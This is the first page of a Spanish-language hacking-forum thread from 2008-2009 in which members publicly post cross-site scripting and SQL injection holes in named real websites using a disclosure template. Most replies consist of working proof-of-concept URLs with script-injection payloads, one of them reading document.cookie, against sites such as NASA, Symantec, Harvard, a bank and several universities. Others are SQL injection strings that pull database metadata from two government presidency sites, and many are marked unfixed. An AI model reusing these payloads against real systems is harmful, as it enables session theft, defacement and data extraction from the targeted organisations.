elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Recopilatorio de Vulnerabilidades de XSS/SQLinjection
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 6 Ir Abajo Respuesta Imprimir
Autor Tema: Recopilatorio de Vulnerabilidades de XSS/SQLinjection  (Leído 85,412 veces)
sirdarckcat
Aspirante a supervillano
Moderador
***
Desconectado Desconectado

Mensajes: 7.029


No estoy loco, soy mentalmente divergente


Ver Perfil WWW
Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« en: 26 Mayo 2008, 03:50 am »

Post para reportar de forma pública una vulnerabilidad de XSS o SQLinjection en un sitio web que no use software distribuido (es decir, que su código no sea accesible).

En caso de que sea software distribuido se puede crear un nuevo tema describiendo la vulnerabilidad.

Solo se permite la publicación de esta información en este tema, y no se puede crear un tema individual reportando este tipo de vulnerabilidades, en caso de hacerlo este será borrado.

El formato es el siguiente (ejemplo):

Sitio web: http://www.google.com/
Descubridor: sirdarckcat
URL del aviso: http://sirdarckcat.blogspot.com/2007/10/vulns-of-google-that-where-and-are-not.html
Fecha de descubrimiento: 27 de Julio del 2007
Fecha de notificación: 27 de Julio del 2007
Fecha de publicación: 13 de Octubre del 2007
Arreglado : Si, desde el 4 de Agosto del 2007
Información adicional:
Código:
http://www.google.com/gwt/mdp/x/en/detect/1?manually=true&brand=sirdackcat&model=sirdarckcat.net%3Cscript%3Ealert(document.cookie);%3C/script%3E


Es importante notar que los siguientes campos son obligatorios:
Sitio web, URL del aviso, Descubridor, Información adicional

Sinembargo Descubridor puede quedar como Anónimo.

Información adicional deberá contener la dirección de enlace al PoC o a una captura de pantalla.

En caso de que sea un enlace este deberá estar entre etiquetas [code][/code].

Además siguiendo con la política de disclosure (ver reglas), solo se aceptarán PoCs que:
Citar
    En los foros públicos, la publicación de vulnerabilidades en sitios Web específicos, esta permitida, si y sólo si: ésta tiene un pagerank igual o superior a 4, fue publicada en otro lugar previamente, y el enlace se mantenga firme con lo estipulado en la sección II.A.2.b. En caso de que la vulnerabilidad sea de un software distribuido, se podrá describir la vulnerabilidad en el foro correspondiente. Sin embargo, en ese caso, esta prohibido colocar sitios Web vulnerables de terceros.
Es decir, URL del aviso debe ser una URL externa al foro, y es obligatoria (a menos que la vulnerabilidad ya haya sido arreglada).

Si no tienen un blog donde publicar estas vulnerabilidades, o les da flojera hacerlo, les recomiendo http://txt.io/ es rapido y sencillo. Pueden publicar exactamente lo que pusieron aqui en el foro, pero es importante que tengamos una fuente a donde enlazar el descubrimiento de la vulnerabilidad, para evitar problemas con los sitios web.

El código bbcode del formato es:

Citar
[b]Sitio web: [/b]
[b]Descubridor: [/b]
[b]URL del aviso: [/b]
[b]Fecha de descubrimiento: [/b]
[b]Fecha de notificación: [/b]
[b]Fecha de publicación: [/b]
[b]Arreglado: [/b]
[b]Información adicional: [/b]
[code][/code]

Fuera de esto, comentarios sobre las vulnerabilidades aqui comentadas deberán estar en otro post.

Esto se deberá hacer "citando" el mensaje en cuestión en un tema nuevo.

Si el comentario es de pertinencia solo al autor del mensaje, este se deberá mandar por MP, y no en un tema nuevo, de lo contrario será borrado sin aviso.

Es todo! Gracias :)

Saludos!!
« Última modificación: 11 Febrero 2009, 08:07 am por sirdarckcat » En línea

Achernar


Desconectado Desconectado

Mensajes: 317



Ver Perfil
Nuevo Mensaje
« Respuesta #1 en: 26 Mayo 2008, 18:56 pm »

Sitio web: www.lawebdelprgramdor.com
Descubridor: Xvan
URL del aviso:   http://www.lawebdelprogramador.com/news/mostrar_new.php?id=38&texto=Hackers&n1=496610&n2=0&n3=0&n4=0&n5=0&n6=0&n7=0&n8=0&n9=0&n0=0
Fecha de descubrimiento: 25/05/2008
Fecha de notificación: 25/05/2008
Fecha de publicación: 25/05/2008
Arreglado: creo que todavia no
Información adicional: solo hay que modificar el valor del campo "texto" por un script
Código:
http://www.lawebdelprogramador.com/news/mostrar_new.php?id=270&texto=<script>alert()</script>&n1=480872&n2=0
En línea

The X-C3LL

Desconectado Desconectado

Mensajes: 3


New Nick, New Life :)


Ver Perfil
Re: Vulnerabilidades de XSS/SQLinjection
« Respuesta #2 en: 31 Julio 2008, 16:57 pm »

Sitio Web Www.ForoActivo.coM
Descubridor: Vengador de las Sombras
URL de aviso:http://argeniversohack.66ghz.com/index.php/topic,2002.msg4906/topicseen.html#msg4906
Fecha de descubrimiento: 31 de Julio de 2008
Fecha de notificación: --
Fecha de publicación: 31 de Julio de 2008
Tipo: XSS
Información Adicional:

 El archivo vulnerable es el de reportar abusos (/report_abuse.forum), por lo que todos los foros son vulnerables:

Código:
http://[Foro].foroactivo.net/report_abuse.forum?page=%2F%20<script>alert(/Fl4m1ng   0ur sk1llZ/)</script>&report=1
En línea

Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #3 en: 4 Septiembre 2008, 08:20 am »

Sitio web: www.top-central.com
Descubridor: Eazy
URL del aviso: http://eazyrlz.blogspot.com/2008/09/xss-en-wwwtop-centralcom.html
Fecha de descubrimiento: 8/7/08
Fecha de notificación: 8/7/08
Fecha de publicación: 04 de Septiembre de 2008
Arreglado: No
Respuesta: Muchas gracias por avisarla, hay creditos en el codigo fuente.
Información adicional:
Código:
"><script>alert(/xss/.source)</script>
« Última modificación: 30 Septiembre 2008, 02:55 am por Eazy » En línea

[/url]
Eazy

Desconectado Desconectado

Mensajes: 229


Eazy [FM-Team]


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #4 en: 13 Septiembre 2008, 03:13 am »

Sitio web: www.nexon.net
Descubridor: Eazy
URL del aviso: http://eazyrlz.blogspot.com/2008/09/xss-en-wwwnexonnet.html
Fecha de descubrimiento: 12/09/08
Fecha de notificación: 12/09/08
Fecha de publicación: 12/09/08
Arreglado: No
Información adicional:
Código:
"><script>alert(/xss/.source)</script>
En línea

[/url]
WHK
Moderador Global
***
Desconectado Desconectado

Mensajes: 6.589


Sin conocimiento no hay espíritu


Ver Perfil WWW
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #5 en: 29 Enero 2009, 03:52 am »

Antes que nada hay que decir que todos los administradores de estos sitios webs fueron avisados de sus multiples fallas para que pudiesen ser corregidas antes de ser expuestas, solo un webmaster respondió y fue webtaller, el resto la mayoría los reparó solo en parte. esto es para tener un poco de consiencia al momento de crear un sitio web o manetener uno de que esto de la seguridad web no es algo para tomar a la ligera, antiguamente un xss era considerado de bajo riesgo pero con el tiempo ya se ha considerado medio alto dependiendo del caso ya que puedes no causar nada como la obtensión de privilegios de administración en los mismos sitios.

Ninguna web fue afectada.

Descubridor: todas por WHK.

La Nasa
Código:
http://mynasa.nasa.gov/portal/site/mynasa/template.'"><h1>XSS

La Nasa nuevamente
Código:
http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param=%68%74%74%70%3A%2F%2F%77%77%77%2E%6A%63%63%68%61%72%72%79%2E%63%6F%6D%2F%70%72%75%65%62%61%73%2F%6E%61%73%61%2E%67%6F%76%2F%77%68%6B%2E%61%73%78

MTV
Código:
http://www.mtvla.com/news/droplets/email_story_form.jhtml?title="><h1>XSS

Defcon
Código:
https://pics.defcon.org/misc.php?action=cookies
Editas tu cookie bbsessionhash:%3Ch1%3EXSS+by+WHK%3Cscript%3Ealert%28%2Fxss%2F%29%3B%3C%2Fscript%3E

Telefónica
Código:
http://195.53.169.41/jsp/CDoResult.jsp?QUERYTYPE=32&QUERYTXT=lol&QUERYLEVEL=2&SESION=a';}%3C/script%3E%3Ch1%3EXSS%20by%20WHK%3Cscript%3E%3C!–&NOMLIB=tel_chile_lib|grupo_tel_chile_lib|salaprensa_lib&QUERYSTRING=&IDIOM=&FILEINI=default_cl&SALADEPRENSA=&PAIS=CL

Foros Terra
Código:
http://foros.terra.com.mx/portada.cfm?s=F&pCat=11"><br><br><br><h1>XSS

Descargas Terra
Código:
http://descargas.terra.es/index.phtml?&action=all&id_section=1"><script>alert(1) ;</script>&search="><br><h1>XSS

Simantec (de Norton Antivirus)
Código:
http://www.symantecstore.com/dr/v2/ec_main.entry25?page= ESUpgradeRenewal&client=Symantec&sid=41185&cid=2073aaaa"><br><br><br><h1>XSS%20by%20WHK<br><br><br>

Esest (de Nod32 Antivirus)
Código:
http://www.nod32.bg/ (en el buscador de arriba poner "><h1>XSS )

Infosecurityevent
Código:
http://www.infosecurityevent.com/App/homepage.cfm?keywords=%22%3E%3Ch1%3EXSS+by+WHK%3Cbr%3E%3C%2Fh1%3E&appname=100004&moduleid=42&siteadvsearch=1&collections=1%2C2%2C3%2C4%2C5%2C6%2C9&searchtype=all&displaytype=relevance&searchmethod=basic&fuseaction=search.results&go.x=14&go.y=8

Megaupload
Código:
http://www.megaupload.com/signup/es/index.php (petición POST al valor 'email' "><h1>XSS )

Winamp
Código:
http://www.winamp.com/skins/search/?s=m&q=;"></script><script>alert(/XSS/);</script>

Imageshack
Código:
http://reg.imageshack.us/content.php?page=email&q=abuse2/><h1>XSS

Webtaller
Código:
http://www.webtaller.com/regsystem/login.php?ref=/envios/enviar_articulo.php?id="><h1>XSS

Universidad Surcolombiana (Colombia)
Código:
http://portal.usco.edu.co:8080/portal/portal/pagina.jsp?id=70"><h1>XSS%20by%20WHK<script>alert(/XSS%20by%20WHK/);</script>&index=1"><h1><br>XSS

Universidad de Chile
Código:
http://www.uchile.cl/uchile.portal?_nfpb=true&_pageLabel=not&url=42454"><h1>XSS

Pontificia Universidad Católica de Chile
Código:
http://www.uc.cl/ (donde dice "buscar personas" poner "><h1>XSS )

Universidad Iberoamericana de México
Código:
http://enlinea3.uia.mx/www/busqueda_uia.cfm?busqueda=%22%3E%3Ch1%3EXSS

Universidad de Buenos Aires UBA (Argentina)
Código:
http://www.uba.ar/comunicacion/difusion/agenda/encurso.php?dia=7&mes="><h1>XSS7&?o=2007#4106

Universidade de São Paulo USP (Brasil)
Código:
http://noticias.usp.br/acontece/obterNoticia?codntc=17246&codnucjrn=1"><h1>XSS

Universidad Harvard (Estados Unidos)
Código:
https://www.pin1.harvard.edu/pin/submit-login (en datos poner "><h1>XSS )

Sourceforge
Código:
http://sourceforge.net/search/?type_of_search=soft&words=';"/></script><h1>XSS<script>alert();</script>

Softronic
Código:
http://zonealarm-antivirus.softonic.com/?refmkt=6aaaaa"><script>alert(/XSS by WHK/);</script>

WikiWix (Buscador Wikipedia)
Código:
http://es.wikiwix.com/index.php?action="><h1>XSS<br><br>?=es&bg=es

Nintendo
Código:
http://www.nintendo-europe.com/NOE/es/ES/search/search.jsp?searchText=';}}"></script><h1>XSS<script>alert();</script>&indexName=all

Sony
Código:
http://www.sony.es/search/Search.action?applicationtype=Search&searchtype=product&site=odw_es_ES?ion=es_ES_Search&start=1&page=ProductMultiSiteSearchResult&shortcut=true&query=';</script><script>alert();</script>&locale=es_ES&brand=default&allSections=true

Meanwhile
Código:
http://meanwhile.com/?domain=hackxcrack.com"><h1><br>XSS by WHK<script>&

SPAM(1)
Código:
http://www.SPAM(1)/top/search.php (en el buscador poner "><h1>XSS )

SPAM(3) (elhacker.org)
Código:
http://elhacker.org/ (en el buscador poner "><h1>XSS )

New-Bytes.net
Código:
http://md5.new-bytes.net/encoder.php (donde dice codificar poner '"><h1>XSS )

Codebreak.tk
Código:
http://codebreak.uni.cc/tools/shellcode.php (poner </textarea><h1>XSS )

ElHacker.net
Código:
http://ns2.elhacker.net/cgi-bin/birdcast.cgi (Crear una referencia con contenido HTML incrustado)

Dimitrix
Código:
http://www.dimitrix.es/youtube/ (poner </textarea><h1>XSS )

Piojosoft
Código:
http://www.piojosoft.com/index.php?sección=programas/buscatop&pclaves=<script>alert(/XSS/)</script>

Portalhacker.net
Código:
http://www.portalhacker.net/buscar.php (metodo post a un input llamado query ""><h1>XSS " mas el valor "ok " en el valor "buscar")

DarkNet.org
Código:
http://www.darknet.org/ (metodo GET al input 's' :  ""><h1>XSS ")

BlindSec
Código:
http://www.blindsec.com/notes.php (Editar el texto escapando con un '</textarea>' y guardando)

johnny.ihackstuff
Código:
http://johnny.ihackstuff.com/index.php?searchword=';alert('XSS')// &option=com_search&Itemid=5

Las FARC
Código:
http://www.farcep.org/?node=3&op=search&date_range=E+0&search_string=%27%22%3E%3Ch1%3Etest&imageFiel
d.x=0&imageField.y='%22%3E%3Ch1%3Etest0<script>alert(/esto es un problema/);</script>

Universidad DUOC de Chile
Código:
http://mercadolaboral.duoc.cl/alerta.cfm?msg='%22%3E%3Ciframe%20src=http://xssed.com%3E

Zone-H
Código:
http://www.zone-h.org/index.php?searchword=';alert('XSS')//%20&option=com_search&Itemid=5

Banco Santander
Código:
http://www.santander.com/csgs/Satellite?accesibilidad=3&canal=CAccionistas&cid=1147087106975&empr=SA
NCorporativo&leng=es_ES&pagename=SANCorporativo/Page/SC_ContenedorBuscadorGeneral&pagina=99999999999
99999999'"><script>alert(/xss/);</script>

Anonymouse
Código:
http://anonymouse.org/cgi-bin/anon-email.cgi
POST: to=yo%40noexist.fakeeeeee&subject=<script>alert(2)</script>&text=<script>alert(1)</script>

Ejercito de Chile
Código:
http://www.ejercito.cl/busqueda/index.php
POST: PHPSESSID=478a586e7ac990faa11abde01c939ad8&texto=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&pub_d esde=&pub_hasta=&contenido=0&image222.x=0&image222.y=0

Yahoo
Código:
http://es.search.yahoo.com/search?p=http%3A%2F%2Fwww.huifa.cl%2Fbuscador%2Fbuscar.php%3F%26cod_rubro
%3D%26cb%3D%26criterio%3D%3C%2Ftitle%3E%3Ch1%3E%3Cmarquee%3Emuajajajaja%3C%2Fmarquee%3E%3C%2Fh1%3E%3
Ctitle%3E&fr=yfp-t-501&ei=UTF-8&meta=vl%3D

Nota: las imagenes las retiré porque utilizaban demasiado espacio, ya las pondré nuevamente pero en miniaturas cuando estén listas.

Fuentes
http://www.jccharry.com/portada/component/content/article/51.html
http://xssed.com/archive/author=whk
« Última modificación: 10 Febrero 2009, 22:20 pm por WHK » En línea

Erik#


Desconectado Desconectado

Mensajes: 1.138


Gundam


Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #6 en: 10 Febrero 2009, 09:24 am »

Sitio web:  www.ipsaportal.unina.it
Descubridor: Erik#
URL del aviso: http://netzeven.wordpress.com/2009/02/10/xss-en-ipsatotal-buscador/
Fecha de descubrimiento: 10.02.09
Fecha de notificación: ---
Fecha de publicación: 10.02.09
Arreglado: No
Información adicional: XSS en buscador

Código:
http://ipsaportal.unina.it/?s=%22%3E%3Cimg+src%3D%22http%3A%2F%2Fwww.krews.es%2Fhackbyerik.png%22%3E&x=0&y=0
En línea

Krackwar ™

Desconectado Desconectado

Mensajes: 100



Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #7 en: 17 Febrero 2009, 07:10 am »


Sitio web:  http://www.presidencia.gob.bo
Descubridor: N1GHTSCR34M
URL del aviso: http://krackcreations.blogspot.com/2009/02/bug-sql-inyection-en.html
Fecha de descubrimiento: 17.02.09
Fecha de notificación: ---
Fecha de publicación: 17.02.09
Arreglado: No
Información adicional:

Código:
http://www.presidencia.gob.bo/prensa/Noticias.asp?id=convert(int,(select%20top%201%20column_name%20from%20information_schema.columns%20where%20table_name=%27VIEW1%27))
En línea

WHK es mas u17r4m4573r31337 que yo



El error mas grande de el mundo es decir que el ser humano es inteligente.

Facismo , antifacismo , etc.. la misma mierda ..
Soy el-> http://tinyurl.com/fantasma-de-krackwar
Código
  1. mov ecx,1000
  2. Etiqueta:
  3. invoke printf,"No Copiare en clases"
  4. loop Etiq
Krackwar ™

Desconectado Desconectado

Mensajes: 100



Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #8 en: 17 Febrero 2009, 19:58 pm »



Sitio web:  http://www.presidencia.gov.py
Descubridor: N1GHTSCR34M
URL del aviso: http://krackcreations.blogspot.com/2009/02/bug-sql-inyection-en.html
Fecha de descubrimiento: 17.02.09
Fecha de notificación: ---
Fecha de publicación: 17.02.09
Arreglado: No
Información adicional:

Código:
http://www.presidencia.gov.py/detalle.asp?codigo=convert(int,(@@Version))
En línea

WHK es mas u17r4m4573r31337 que yo



El error mas grande de el mundo es decir que el ser humano es inteligente.

Facismo , antifacismo , etc.. la misma mierda ..
Soy el-> http://tinyurl.com/fantasma-de-krackwar
Código
  1. mov ecx,1000
  2. Etiqueta:
  3. invoke printf,"No Copiare en clases"
  4. loop Etiq
qwertty

Desconectado Desconectado

Mensajes: 12



Ver Perfil
Re: Recopilatorio de Vulnerabilidades de XSS/SQLinjection
« Respuesta #9 en: 19 Julio 2009, 03:47 am »

Sitio web: www.fotolog.com
Descubridor: FeDeX
URL del aviso: http://txt.io/t-agZ0eHQtaW9yDwsSB3R4dExpc3QY3aYCDA
Fecha de descubrimiento: Un dia en el año 2008
Fecha de notificación: --
Fecha de publicación: 18/jul/2009
Arreglado: No :)
Información adicional: Sale todo en la URL de aviso..
En línea

Páginas: [1] 2 3 4 5 6 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Recopilatorio de C#
.NET (C#, VB.NET, ASP)
/* strcpy() */ 3 8,126 Último mensaje 5 Junio 2007, 17:50 pm
por piroman
Como hacer update en SQLinjection
Nivel Web
BlackHKR 6 6,246 Último mensaje 12 Mayo 2010, 20:55 pm
por BHK
Duda SQLinjection en information_schema « 1 2 »
Nivel Web
miguelskk 10 8,078 Último mensaje 17 Julio 2010, 01:46 am
por TapIt
AYUDA:Captura de paquetes con Wireshark para herramienta SQLinjection
Hacking
NetStorm 1 3,521 Último mensaje 5 Octubre 2011, 00:06 am
por alpha015
SQLInjection sin acceso a information_schema
Nivel Web
buggy_man 3 3,089 Último mensaje 11 Agosto 2012, 07:17 am
por afdlkglfgfdgfhgf
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines